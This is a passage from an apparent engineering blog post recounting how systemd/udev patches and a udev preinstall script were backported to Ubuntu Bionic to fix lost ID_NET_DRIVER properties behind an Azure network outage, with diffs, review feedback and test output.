ID_NET_NAME= properties on non-'add' uevent
Bug: https://github.com/systemd/systemd/issues/17532
Bug-Ubuntu: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1902960
Origin: upstream, https://github.com/systemd/systemd/commit/e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151
Previous commit makes drop ID_NET_DRIVER=, ID_NET_LINK_FILE=, and
ID_NET_NAME= properties for network interfaces on 'move' uevent.
ID_NET_DRIVER= and ID_NET_LINK_FILE= properties are used by networkctl.
ID_NET_NAME= may be used by end-user rules or programs. So, let's
re-assign them on 'move' uevent. (Note that strictly speaking, this
makes them re-assigned on all but 'remove' uevent.)
---
NOTE: backported from upstream, to keep as much backwards compatibility as possible;
specifically 1) don't return failure if device_get_action() fails, and 2) context
adjustments since the upstream commit builds on splitting out the function
action into separate functions, which our code doesn't include.
rules.d/80-net-setup-link.rules | 2 +-
src/udev/net/link-config.c | 30 +++++++++++++++++++++++++++---
2 files changed, 28 insertions(+), 4 deletions(-)
--- a/rules.d/80-net-setup-link.rules
+++ b/rules.d/80-net-setup-link.rules
@@ -4,7 +4,7 @@ SUBSYSTEM!="net", GOTO="net_setup_link_e
IMPORT{builtin}="path_id"
-ACTION!="add", GOTO="net_setup_link_end"
+ACTION=="remove", GOTO="net_setup_link_end"
IMPORT{builtin}="net_setup_link"
--- a/src/udev/net/link-config.c
+++ b/src/udev/net/link-config.c
@@ -10,6 +10,7 @@
#include "conf-files.h"
#include "conf-parser.h"
#include "def.h"
+#include "device-private.h"
#include "device-util.h"
#include "ethtool-util.h"
#include "fd-util.h"
@@ -351,6 +352,7 @@ int link_config_apply(link_config_ctx *c
struct ether_addr *mac = NULL;
const char *new_name = NULL;
const char *old_name;
+ DeviceAction a = _DEVICE_ACTION_INVALID;
unsigned speed, name_type = NET_NAME_UNKNOWN;
NamePolicy policy;
int r, ifindex;
@@ -364,6 +366,16 @@ int link_config_apply(link_config_ctx *c
if (r < 0)
return r;
+ r = device_get_action(device, &a);
+ if (r < 0)
+ log_device_warning_errno(device, r, "Failed to get ACTION= property: %m");
+ else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name,
config->autonegotiation, config->advertise,
config->speed, config->duplex, config->port);
@@ -421,6 +433,12 @@ int link_config_apply(link_config_ctx *c
goto no_rename;
}
+ if (a == DEVICE_ACTION_MOVE) {
+ log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+ new_name = old_name;
+ goto no_rename;
+ }
+
if (ctx->enable_name_policy && config->name_policy)
for (NamePolicy *p = config->name_policy; *p != _NAMEPOLICY_INVALID; p++) {
policy = *p;
</code></pre></div></div>
<p>Okay, this is much more reasonable. This time around, we still use
<code class="language-plaintext highlighter-rouge">device_get_action()</code>, and <code class="language-plaintext highlighter-rouge">log_device_debug()</code>, we now set <code class="language-plaintext highlighter-rouge">*name = old_name;</code>
or <code class="language-plaintext highlighter-rouge">new_name = old_name;</code> and <code class="language-plaintext highlighter-rouge">goto no_rename;</code> instead of calling
<code class="language-plaintext highlighter-rouge">r = sd_device_get_sysname(device, ret_name);</code>.</p>
<p>We have <code class="language-plaintext highlighter-rouge">new_name = old_name;</code>, we can use this knowledge to help us build the
backport to Focal.</p>
<p>Even better, Dan Streetman left us a note:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>NOTE: backported from upstream, to keep as much backwards compatibility as possible;
specifically 1) don't return failure if device_get_action() fails, and 2) context
adjustments since the upstream commit builds on splitting out the function
action into separate functions, which our code doesn't include.
</code></pre></div></div>
<p>Both of these hints would turn out to be crucial.</p>
<p>The first thing we need to figure out, is how to get the device action name,
and in the form of <code class="language-plaintext highlighter-rouge">DeviceAction</code> enum.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef enum DeviceAction {
DEVICE_ACTION_ADD,
DEVICE_ACTION_REMOVE,
DEVICE_ACTION_CHANGE,
DEVICE_ACTION_MOVE,
DEVICE_ACTION_ONLINE,
DEVICE_ACTION_OFFLINE,
DEVICE_ACTION_BIND,
DEVICE_ACTION_UNBIND,
_DEVICE_ACTION_MAX,
_DEVICE_ACTION_INVALID = -1,
} DeviceAction;
</code></pre></div></div>
<p>We have the enum, which is something, so we can go ahead and add the hunks:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -25,6 +25,8 @@
#include "alloc-util.h"
#include "conf-files.h"
#include "conf-parser.h"
+#include "device-private.h"
+#include "device-internal.h"
#include "ethtool-util.h"
#include "fd-util.h"
#include "libudev-private.h"
@@ -371,6 +373,7 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
struct ether_addr *mac = NULL;
const char *new_name = NULL;
const char *old_name;
+ DeviceAction a = _DEVICE_ACTION_INVALID;
unsigned speed;
int r, ifindex;
</code></pre></div></div>
<p>Next, let’s look at <code class="language-plaintext highlighter-rouge">r = device_get_action(device, &a);</code></p>
<p>We are taking <code class="language-plaintext highlighter-rouge">struct udev_device</code> as <code class="language-plaintext highlighter-rouge">device</code>, and getting the <code class="language-plaintext highlighter-rouge">DeviceAction</code>
from it, and sticking it in <code class="language-plaintext highlighter-rouge">a</code>.</p>
<p>I came across <code class="language-plaintext highlighter-rouge">udev_device_get_action()</code> which returns a string:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>src/libudev/libudev.h:107:const char *udev_device_get_action(struct udev_device *udev_device);
</code></pre></div></div>
<p>This gets us halfway there. Some further searching around <code class="language-plaintext highlighter-rouge">DeviceAction</code> parent
header files, <code class="language-plaintext highlighter-rouge">device-internal.h</code> we find:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceAction device_action_from_string(const char *s) _pure_;
</code></pre></div></div>
<p>which is exactly what we want. So thus:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>r = device_get_action(device, &a);
</code></pre></div></div>
<p>becomes</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>a = device_action_from_string(udev_device_get_action(device));
</code></pre></div></div>
<p>Quite a tidy backport if I don’t say so myself. Now we can reuse the set and
the if statement:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
</code></pre></div></div>
<p>and also:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (a == DEVICE_ACTION_MOVE) {
</code></pre></div></div>
<p>keeping the spirit and intention if the upstream commit.</p>
<p>Now, let’s look at the first major hunk:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -612,6 +614,20 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
assert(device);
assert(ret_name);
+ r = device_get_action(device, &a);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get ACTION= property: %m");
+
+ if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+ r = sd_device_get_sysname(device, ret_name);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get sysname: %m");
+
+ return 0;
+ }
+
r = link_config_apply_ethtool_settings(&ctx->ethtool_fd, config, device);
if (r < 0)
return r;
</code></pre></div></div>
<p>Comparing this with Dan Streetmans first hunk for Focal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -364,6 +366,16 @@ int link_config_apply(link_config_ctx *c
if (r < 0)
return r;
+ r = device_get_action(device, &a);
+ if (r < 0)
+ log_device_warning_errno(device, r, "Failed to get ACTION= property: %m");
+ else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_device_debug(device, "Skipping to apply .link settings on '%s' uevent.", device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name,
config->autonegotiation, config->advertise,
config->speed, config->duplex, config->port);
</code></pre></div></div>
<p>I came up with the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -383,6 +386,16 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
if (!old_name)
return -EINVAL;
+ a = device_action_from_string(udev_device_get_action(device));
+ if (a < 0)
+ log_warning_errno(errno, "Failed to get ACTION= property: %m");
+ else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_debug("Skipping to apply .link settings on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name, config);
if (r < 0) {
</code></pre></div></div>
<p>We check <code class="language-plaintext highlighter-rouge">a</code> instead of <code class="language-plaintext highlighter-rouge">r</code>, and we change <code class="language-plaintext highlighter-rouge">log_device_debug</code> to a plain
<code class="language-plaintext highlighter-rouge">log_debug</code>, and manually supply the device using <code class="language-plaintext highlighter-rouge">udev_device_get_sysname(device)</code>.
We also re-use Dan Streetman’s idea of <code class="language-plaintext highlighter-rouge">*name = old_name</code> and <code class="language-plaintext highlighter-rouge">return 0</code>.</p>
<p>For the second hunk, we do something similar:</p>
<p>The original hunk:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -620,9 +636,17 @@ int link_config_apply(link_config_ctx *ctx, const link_config *config, sd_device
if (r < 0)
return r;
- r = link_config_generate_new_name(ctx, config, device, &new_name);
- if (r < 0)
- return r;
+ if (a == DEVICE_ACTION_MOVE) {
+ log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+
+ r = sd_device_get_sysname(device, &new_name);
+ if (r < 0)
+ return log_device_error_errno(device, r, "Failed to get sysname: %m");
+ } else {
+ r = link_config_generate_new_name(ctx, config, device, &new_name);
+ if (r < 0)
+ return r;
+ }
r = link_config_apply_alternative_names(&ctx->rtnl, config, device, new_name);
if (r < 0)
</code></pre></div></div>
<p>Dan Streetman’s backport for Focal:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -421,6 +433,12 @@ int link_config_apply(link_config_ctx *c
goto no_rename;
}
+ if (a == DEVICE_ACTION_MOVE) {
+ log_device_debug(device, "Skipping to apply Name= and NamePolicy= on '%s' uevent.", device_action_to_string(a));
+ new_name = old_name;
+ goto no_rename;
+ }
+
if (ctx->enable_name_policy && config->name_policy)
for (NamePolicy *p = config->name_policy; *p != _NAMEPOLICY_INVALID; p++) {
policy = *p;
</code></pre></div></div>
<p>and what I came up with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@@ -413,6 +426,13 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
return -ENODEV;
}
+ if (a == DEVICE_ACTION_MOVE) {
+ log_debug("Skipping to apply Name= and NamePolicy= on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
if (ctx->enable_name_policy && config->name_policy) {
NamePolicy *policy;
</code></pre></div></div>
<p>We keep the same sort of structure as Dan Streetman, but since <code class="language-plaintext highlighter-rouge">no_rename</code> label
does not exist, we simply <code class="language-plaintext highlighter-rouge">return 0</code> early.</p>
<p>and thus, we have the final patch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>From e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151 Mon Sep 17 00:00:00 2001
From: Yu Watanabe <watanabe.yu+github@gmail.com>
Date: Mon, 14 Sep 2020 15:21:04 +0900
Subject: [PATCH] udev: re-assign ID_NET_DRIVER=, ID_NET_LINK_FILE=,
ID_NET_NAME= properties on non-'add' uevent
Bug: https://github.com/systemd/systemd/issues/17532
Bug-Ubuntu: https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1988119
Origin: upstream, https://github.com/systemd/systemd/commit/e0e789c1e97e2cdf1cafe0c6b7d7e43fa054f151
Previous commit makes drop ID_NET_DRIVER=, ID_NET_LINK_FILE=, and
ID_NET_NAME= properties for network interfaces on 'move' uevent.
ID_NET_DRIVER= and ID_NET_LINK_FILE= properties are used by networkctl.
ID_NET_NAME= may be used by end-user rules or programs. So, let's
re-assign them on 'move' uevent. (Note that strictly speaking, this
makes them re-assigned on all but 'remove' uevent.)
---
NOTE: backported from upstream, to keep as much backwards compatibility as possible;
specifically 1) don't return failure if device_get_action() fails, and 2) context
adjustments since the upstream commit builds on splitting out the function
action into separate functions, which our code doesn't include.
rules/80-net-setup-link.rules | 2 +-
src/udev/net/link-config.c | 20 ++++++++++++++++++++
2 files changed, 21 insertions(+), 1 deletion(-)
diff --git a/rules/80-net-setup-link.rules b/rules/80-net-setup-link.rules
index 6e411a9..bafc3fb 100644
--- a/rules/80-net-setup-link.rules
+++ b/rules/80-net-setup-link.rules
@@ -4,7 +4,7 @@ SUBSYSTEM!="net", GOTO="net_setup_link_end"
IMPORT{builtin}="path_id"
-ACTION!="add", GOTO="net_setup_link_end"
+ACTION=="remove", GOTO="net_setup_link_end"
IMPORT{builtin}="net_setup_link"
diff --git a/src/udev/net/link-config.c b/src/udev/net/link-config.c
index a4368f0..4c7e87d 100644
--- a/src/udev/net/link-config.c
+++ b/src/udev/net/link-config.c
@@ -25,6 +25,8 @@
#include "alloc-util.h"
#include "conf-files.h"
#include "conf-parser.h"
+#include "device-private.h"
+#include "device-internal.h"
#include "ethtool-util.h"
#include "fd-util.h"
#include "libudev-private.h"
@@ -371,6 +373,7 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
struct ether_addr *mac = NULL;
const char *new_name = NULL;
const char *old_name;
+ DeviceAction a = _DEVICE_ACTION_INVALID;
unsigned speed;
int r, ifindex;
@@ -383,6 +386,16 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
if (!old_name)
return -EINVAL;
+ a = device_action_from_string(udev_device_get_action(device));
+ if (a < 0)
+ log_warning_errno(errno, "Failed to get ACTION= property: %m");
+ else if (!IN_SET(a, DEVICE_ACTION_ADD, DEVICE_ACTION_BIND, DEVICE_ACTION_MOVE)) {
+ log_debug("Skipping to apply .link settings on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
r = ethtool_set_glinksettings(&ctx->ethtool_fd, old_name, config);
if (r < 0) {
@@ -413,6 +426,13 @@ int link_config_apply(link_config_ctx *ctx, link_config *config,
return -ENODEV;
}
+ if (a == DEVICE_ACTION_MOVE) {
+ log_debug("Skipping to apply Name= and NamePolicy= on %s device for '%s' uevent.", udev_device_get_sysname(device), device_action_to_string(a));
+
+ *name = old_name;
+ return 0;
+ }
+
if (ctx->enable_name_policy && config->name_policy) {
NamePolicy *policy;
--
2.34.1
</code></pre></div></div>
<p>I quickly got a test package building in a ppa, and eagerly attempted to
reproduce the issue:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo udevadm trigger && sudo systemctl restart systemd-networkd
$ ping google.com
PING google.com (172.253.122.138) 56(84) bytes of data.
64 bytes from bh-in-f138.1e100.net (172.253.122.138): icmp_seq=1 ttl=103 time=1.67 ms
</code></pre></div></div>
<p>I was relieved. The fix worked as intended, and we fixed the bug.
I then created a proper debdiff, and uploaded it to the Launchpad bug as
systemd 237-3ubuntu10.55.</p>
<p><a href="https://launchpadlibrarian.net/621043086/lp1988119_bionic.debdiff">debdiff for systemd 237-3ubuntu10.55</a></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>systemd (237-3ubuntu10.55) bionic; urgency=medium
* d/p/lp1988119-udev-re-assign-ID_NET_DRIVER-ID_NET_LINK_FILE-ID_NET.patch:
Run net_setup_link on 'change' uevents, important for users of the
hv_netvsc driver on Azure. (LP: #1988119)
-- Matthew Ruffell <matthew.ruffell@canonical.com> Wed, 31 Aug 2022 16:35:20 +1200
</code></pre></div></div>
<p>With a full SRU template on the Launchpad bug description, this was ready to
go.</p>
<p><a href="https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1988119">SRU template</a></p>
<p>I message Nishit on Mattermost, and we got this built, and placed into the
ubuntu-security-proposed ppa, since this was going through -security, and not
-updates.</p>
<p>By the time the package hit ubuntu-security-proposed, we are about 8 hours into
my day, and since the issue was no longer absolutely critical, I decided to
err on the side of caution and ask Microsoft Azure engineers for a review
and signoff of the packages in -proposed.</p>
<p>Looking back, this decision to wait for stakeholder signoff before release was
one of the most important decisions in this whole case.</p>
<h2 id="udev-preinstall-script">udev Preinstall Script</h2>
<p>Microsoft got back the next morning, mentioning that the fix works as intended,
works great, and is robust.</p>
<p>But.</p>
<p>Well, the fix is only robust on systems that have been rebooted, or are
<strong>non primed</strong>. That is, systems that haven’t lost <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code> or have
recovered it already.</p>
<p>If a system had already lost <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, for example, by installing
<code class="language-plaintext highlighter-rouge">open-vm-tools</code> and not yet installing the benign systemd security update,
the failure would still occur.</p>
<p>If we had rushed and released systemd 237-3ubuntu10.55 as it was, it would have
likely taken Bionic VMs running on Azure down for a second time.</p>
<p>So, we needed a plan to fix all the machines that are currently ‘primed’.
Microsoft suggested a preinstall script like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pushd /sys/class/net
for i in *; do
echo -n "Checking $i: "
if ! (udevadm info /sys/class/net/$i | grep ID_NET_DRIVER); then
echo "executing trigger on link $i to add ID_NET_DRIVER."
udevadm trigger -c add -y $i
fi
done
popd
</code></pre></div></div>
<p>What it did was for every network device, grep for <code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code>, and if it
is missing, issue a <code class="language-plaintext highlighter-rouge">ADD</code> uevent to the device.</p>
<p>This would certainly fix the issue, but I was initially very concerned about
running this script on not just every single VM running on Azure, but the whole
cohort, from bare metal to KVM VMs to Virtualbox to AWS to GCP to Oracle cloud.
I was quite anxious at the thought, since I didn’t know if issuing a bunch
of <code class="language-plaintext highlighter-rouge">ADD</code> uevents to every Bionic machine in the wild would cause any additional
problems, or a regression.</p>
<p>Instead, I wanted to add a much safer, more targeted fix, of a udev rule,
like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/etc/udev/rules.d/67-azure-network.rules:
SUBSYSTEM=="net", SUBSYSTEMS=="vmbus", DRIVERS=="hv_netvsc", ENV{ID_NET_DRIVER}="hv_netvsc"
</code></pre></div></div>
<p>This would directly target Azure VMs only, and it would directly target <code class="language-plaintext highlighter-rouge">hv_netvsc</code>
devices. I suggested we stick this in the walinuxagent package, but there were
additional issues such as needing to call
<code class="language-plaintext highlighter-rouge">udevadm control --reload-rules && udevadm trigger</code> to make the rule apply,
so we would need to add that in, or make upgrading the udev package add this in.</p>
<p>This causes further problems since we would force reload all rules during an
upgrade and apply them, causing the event that caused the issue in the first
place, and it would override manually changed udev rules with system file rules,
which could create problems for some running systems.</p>
<p>There were also other problems with the udev rule, such as only replacing
<code class="language-plaintext highlighter-rouge">ID_NET_DRIVER</code> when we had also lost additional attributes, and the udev rule
would then have to persist forever.</p>
<p>After discussing this with Microsoft engineers, we all decided that the
preinstall script was the best way forward.</p>
<p>I wrote up a proof of concept to ensure it only gets called once, on upgrade
from any package below systemd 237-3ubuntu10.56, so we only have one upgrade
where we worry about regression risk for <code class="language-plaintext highlighter-rouge">ADD</code> uevents. I wrapped it in a
function, and made sure we return <code class="language-plaintext highlighter-rouge">true</code> at the call to the <code class="language-plaintext highlighter-rouge">ADD</code> uevent.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff -Nru systemd-237/debian/udev.preinst systemd-237/debian/udev.preinst
--- systemd-237/debian/udev.preinst 2021-12-10 22:15:07.000000000 +1300
+++ systemd-237/debian/udev.preinst 2022-09-06 15:18:05.000000000 +1200
@@ -55,6 +55,17 @@
fi
}
+check_ID_NET_DRIVER() {
+ # Ensure ID_NET_DRIVER is set on Network interfaces LP: #1988119
+ for i in $(ls /sys/class/net); do
+ echo -n "Checking $i: "
+ if ! (udevadm info /sys/class/net/$i | grep ID_NET_DRIVER); then
+ echo "Executing trigger on link $i to add ID_NET_DRIVER."
+ udevadm trigger -c add -y $i || true
+ fi
+ done
+}
+
check_version() {
# $2 is non-empty when installing from the "config-files" state
[ -n "$2" ] || return 0
@@ -70,6 +81,10 @@
udevadm control --log-priority=0 || true
fi
fi # 204-4
+
+ if dpkg --compare-versions $2 lt 237-3ubuntu10.56; then
+ check_ID_NET_DRIVER
+ fi # 237-3ubuntu10.56
}
case "$1" in
</code></pre></div></div>
<p>This worked great in a test package. It did generate a bit of output though:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Preparing to unpack .../udev_237-3ubuntu10.55+sf343528v20220906b3_amd64.deb ...
Checking enP50633s1: Executing trigger on link enP50633s1 to add ID_NET_DRIVER.
Checking eth0: Executing trigger on link eth0 to add ID_NET_DRIVER.
Checking lo: Executing trigger on link lo to add ID_NET_DRIVER.
Unpacking udev (237-3ubuntu10.55+sf343528v20220906b3) over (237-3ubuntu10.53) ...
</code></pre></div></div>
<p>Checking the package upgrade on an already primed system:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ udevadm info /sys/class/net/eth0 | grep ID_NET_DRIVER
E: ID_NET_DRIVER=hv_netvsc
$ sudo udevadm trigger
$ udevadm info /sys/class/net/eth0 | grep ID_NET_DRIVER
$ sudo apt update
$ sudo apt install libnss-systemd libpam-systemd libsystemd0 libudev1 systemd systemd-sysv udev
$ udevadm info /sys/class/net/eth0 | grep ID_NET_DRIVER
E: ID_NET_DRIVER=hv_netvsc
$ ping google.com
PING google.com (172.253.122.138) 56(84) bytes of data.
64 bytes from bh-in-f138.1e100.net (172.253.122.138): icmp_seq=1 ttl=103 time=1.67 ms
</code></pre></div></div>
<p>At this point, I was quite worried about the impact of issuing a <code class="language-plaintext highlighter-rouge">ADD</code> uevent
on all Bionic systems, so I made my second best decision in this case:</p>
<p>Asking for help.</p>
<p>I wrote an email to the Foundations, Server, Security, and Sustaining
Engineering teams, explaining the root cause, minimal reproducer, the choice
not to go with a udev rule, and instead the preinstall script.</p>
<p>I asked for any and all advice on issuing <code class="language-plaintext highlighter-rouge">ADD</code> uevents on a mass scale, to
code review of the preinstall script, and general approach.</p>
<p>I got several replies.</p>
<p>The first, was from Christian Ehrhardt, of the Server team, who over the years,
I have asked for help a few times, and always received well thought out and
expert advice.</p>
<p>Christian pointed out that:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+ for i in $(ls /sys/class/net); do
+ echo -n "Checking $i: "
</code></pre></div></div>
<p>will be too noisy. His own laptop had 17 entries, and since every bridge, veth,
and vpn will also be there, larger servers could very well have hundreds of
entries. Christian suggested that we log once that devices are re-probed, and
then log to a file with logger for each device that actually gets modified.</p>
<p>Christian also suggested to use <code class="language-plaintext highlighter-rouge">udevadm settle</code> to avoid any potential
thunderstorms on larger, busier servers when we call <code class="language-plaintext highlighter-rouge">udevadm trigger -c add</code>
in rapid succession.</p>
<p>Christian also suggested that <code class="language-plaintext highlighter-rouge">/sys/class/net/lo</code> will not have a driver, and
can skipped being re-added.</p>
<p>Next, Alex Murray, from the Security Team wrote back, and suggested we use a
glob instead of ls to get devices, and also omit <code class="language-plaintext highlighter-rouge">lo</code> like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for i in /sys/class/net/[!lo]*; do
</code></pre></div></div>
<p>Finally, my colleage Mauricio Oliveira chimed in, and offered some thought
provoking advice on the benefits and pitfalls of using <code class="language-plaintext highlighter-rouge">ADD</code> uevents instead
of <code class="language-plaintext highlighter-rouge">CHANGE</code>.</p>
<p>I took everyone’s advice on board, and pondered the more theoretical problems
that had been raised. The result from everyone’s feedback and a bit more
tweaking is the final debdiff for systemd 237-3ubuntu10.56:</p>
<p><a href="https://launchpadlibrarian.net/622189118/lp1988119_bionic_part_two_V2.debdiff">debdiff for systemd 237-3ubuntu10.56</a></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff -Nru systemd-237/debian/changelog systemd-237/debian/changelog
--- systemd-237/debian/changelog 2022-08-31 16:35:20.000000000 +1200
+++ systemd-237/debian/changelog 2022-09-06 15:18:05.000000000 +1200
@@ -1,3 +1,12 @@
+systemd (237-3ubuntu10.56) bionic; urgency=medium
+
+ * debian/udev.preinst:
+ Add check_ID_NET_DRIVER() to ensure that on upgrade or install
+ from an earlier version ID_NET_DRIVER is present on network
+ interfaces. (LP: #1988119)
+
+ -- Matthew Ruffell <matthew.ruffell@canonical.com> Tue, 06 Sep 2022 15:18:05 +1200
+
systemd (237-3ubuntu10.55) bionic; urgency=medium
* d/p/lp1988119-udev-re-assign-ID_NET_DRIVER-ID_NET_LINK_FILE-ID_NET.patch:
diff -Nru systemd-237/debian/udev.preinst systemd-237/debian/udev.preinst
--- systemd-237/debian/udev.preinst 2021-12-10 22:15:07.000000000 +1300
+++ systemd-237/debian/udev.preinst 2022-09-06 15:18:05.000000000 +1200
@@ -55,6 +55,17 @@
fi
}
+check_ID_NET_DRIVER() {
+ # Ensure ID_NET_DRIVER is set on Network interfaces LP: #1988119
+ for i in /sys/class/net/[!lo]*; do
+ if ! (udevadm info $i | grep --silent ID_NET_DRIVER); then
+ logger --id=$$ --priority=user.info "udev.preinst: Executing trigger on link $(basename $i) to add ID_NET_DRIVER."
+ udevadm trigger -c add -y $(basename $i) || true
+ fi
+ done
+ udevadm settle || true
+}
+
check_version() {
# $2 is non-empty when installing from the "config-files" state
[ -n "$2" ] || return 0
@@ -70,6 +81,10 @@
udevadm control --log-priority=0 || true
fi
fi # 204-4
+
+ if dpkg --compare-versions $2 lt 237-3ubuntu10.56; then
+ check_ID_NET_DRIVER
+ fi # 237-3ubuntu10.56
}
case "$1" in
</code></pre></div></div>
<p>This was then built and uploaded to the ubuntu-security-proposed ppa, and I
again tested it on Azure, and it worked like a charm.</p>
<p>From there, I submitted the package to Microsoft for validation from their
engineers, and while I was waiting, began testing systemd 237-3ubuntu10.56 in
every way imaginable.</p>
<p>The next day we got the okay from Microsoft, and we agreed on a release date
for the package, Tuesday 14th September APAC time.</p>
<p>The current day was Saturday, and I was working the APAC weekend shift,
and I began testing the package on bare metal, KVM, Xen, AWS, GCP, Azure, with
as many quirks and oddities that I could imagine.</p>
<p>The package was also subjected to the automated autopkgtests on our internal
infrastructure, and passed all tests.</p>
<p>When Tuesday came around, it was time to follow through and release the update.
Even after spending my entire weekend shift testing, I was still
a little anxious, due to the nature of the changes involved, the overall risk
of regression and the impact a regression could have.</p>
<p>Since the package was being released to -security, unattended-upgrades will
install the package as soon as it sees it, and if I had made any mistake at all,
at minimum we were looking at causing another complete outage on Azure, and
worst case, bringing down every Bionic system.</p>
<p>In the end, the update went out smoothly. The preinstall script successfully
fixed up primed machines, and the permanent fix to the systemd codebase was
correct and true, preventing the issue from happening again.</p>
<p>The update was released without any fanfare, with no media coverage, and I
couldn’t have been any happier.</p>
<h1 id="aftermath">Aftermath</h1>
<p>A few noteworthy things happened after the update was released.</p>
<h2 id="azure-post-incident-writeup">Azure Post Incident Writeup</h2>
<p>Microsoft Azure has written up their own Post Incident Review (PIR), which you
can find on the Azure Status website:</p>
<p><a href="https://status.azure.com/en-us/status/history/">Azure Status History</a></p>
<p>Make sure you click the “all” setting for timescale, and search for the terms:</p>
<p><code class="language-plaintext highlighter-rouge">Post Incident Review (PIR) - Canonical Ubuntu issue impacted VMs and AKS (Tracking ID 2TWN-VT0)</code></p>
<p>I can’t seem to find a dedicated link. Regardless, they talk about the need for
extra testing and validation, something we will work towards in the near future.</p>
<h2 id="open-vm-tools">open-vm-tools</h2>
<p>You might be wondering what happened to open-vm-tools, since it started this
whole chain of events.</p>
<p>It turns out, there was a bug already open to limit the scope of <code class="language-plaintext highlighter-rouge">udevadm trigger</code>
to just the scsi subsystem, since it was only needed there and nowhere else:</p>
<p><a href="https://bugs.launchpad.net/ubuntu/+source/open-vm-tools/+bug/1968354">LP1968354 Please do not run udevadm trigger without parameters</a></p>
<p>This change had been put on hold due to it being low priority, and a one line
fix, and typically we would hold off on these types of updates to reduce churn,
and instead, pair it up with another SRU and piggyback on it instead.</p>
<p>But due to the high profile of the outage it caused, it was fixed shortly after
the systemd package was released.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff --git a/debian/changelog b/debian/changelog
index 0bfea9a..b8f3ae7 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,11 @@
+open-vm-tools (2:11.0.5-4ubuntu0.18.04.3) bionic; urgency=medium
+
+ * d/open-vm-tools.postinst: Fixes issue with "udevadm trigger"
+ affecting all devices that can cause unwanted side-effects.
+ (LP: #1968354)
+
+ -- Bryce Harrington <bryce@canonical.com> Mon, 19 Sep 2022 22:14:07 +0000
+
